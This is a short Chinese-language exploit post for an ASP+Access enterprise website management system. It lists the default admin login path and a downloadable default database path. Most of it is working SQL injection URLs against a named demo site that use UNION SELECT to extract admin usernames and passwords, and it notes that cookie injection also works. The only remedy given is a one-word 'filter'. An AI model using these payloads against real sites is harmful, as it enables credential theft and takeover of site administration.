源碼簡介:
冠龍科技企業網站管理系統是基於ASP+ACCESS技術開發的電子商務平臺,屬於全自動化、全智能的在線方
式管理、維護、更新的網站管理系統。此係統直接上傳到你的網站空間就可以使用了。完全後臺操作。
×××:
http://www.mycodes.net/25/4771.htm
Demo:
http://www1.glgk.com/2011/
默認後臺:
http://www.xxxx.net/admin/login.asp
默認數據庫:
http://www.xxxx.net/databases/%23database.mdb
exp:
http://www1.glgk.com/2011/CompVisualizeBig.asp?id=23 union select 1,username%2bpassword,3,4,5 from admin
或者單獨查:
http://www1.glgk.com/2011/CompVisualizeBig.asp?id=23 union select 1,username,3,4,5 from admin
http://www1.glgk.com/2011/CompVisualizeBig.asp?id=23 union select 1,password,3,4,5 from admin
另外還存在多處的漏洞.可cookies注入.
上次有朋友問%2b是什麼?就是ascii碼的"+"號的十六進制值.
修復:過濾.
轉自: Mr.DzY